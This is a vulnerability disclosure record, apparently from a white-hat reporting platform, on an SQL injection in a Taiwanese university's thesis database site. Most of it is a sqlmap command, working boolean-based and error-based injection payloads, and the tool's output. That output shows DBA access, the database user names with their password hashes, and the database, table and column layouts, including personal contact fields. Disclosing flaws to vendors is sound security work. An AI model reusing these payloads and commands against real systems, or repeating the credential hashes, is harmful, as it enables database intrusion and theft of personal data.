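2015-10-27: Details reported to the vendor; awaiting vendor handling
2015-10-27: Vendor confirmed; details disclosed to the vendor only
2015-11-06: Details disclosed to core white hats and experts in related fields
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to intern white hats
2015-12-12: Details disclosed to the public
SQL injection vulnerability in a subsite of 铭傅大学, Taiwan (DBA privileges / root password disclosure)
Test URL: http://**.**.**.**/ETD-db/ETD-search-c/view_etd?URN=etd-0626106-123109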
python sqlmap.py -u "http://**.**.**.**/ETD-db/ETD-search-c/view_etd?URN=etd-0626106-123109" -p URN --technique=BE --random-agent --batch --current-user --is-dba --users --passwords
---
Parameter: URN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar
---
web server operating system: Linux Mandriva 2008
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
database management system users [2]:
[*] 'root'@'localhost'
[*] 'skyman'@'localhost'
database management system users password hashes:
[*] root [1]:
    password hash: 634257d56a847967
[*] skyman [1]:
    password hash: 36ead6da63c566ef

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: URN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar
---
web server operating system: Linux Mandriva 2008
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0
available databases [8]:
[*] etd_available
[*] etd_global
[*] etd_qnaire
[*] etd_submitted
[*] information_schema
[*] mysql
[*] test
[*] tmp

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: URN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar
---
web server operating system: Linux Mandriva 2008
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0
Database: etd_available
[7 tables]
+---------------------+
| advisor_by_urn      |
| etd_db_availability |
| etd_main            |
| filename_by_urn     |
| keyword_by_urn      |
| keyword_c_by_urn    |
| oai_record          |
+---------------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: URN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar
---
web server operating system: Linux Mandriva 2008
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0
Database: etd_available
Table: etd_db_availability
[7 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| DB_address      | varchar(100) |
| DB_availability | varchar(30)  |
| DB_email        | varchar(100) |
| DB_grant_choice | varchar(30)  |
| DB_opendate     | date         |
| DB_phone        | varchar(20)  |
| urn             | varchar(30)  |
+-----------------+--------------+
Add filtering.
Severity: High
Vulnerability Rank: 18
Confirmation time: 2015-10-27 23:58
Thank you for the report.
None yet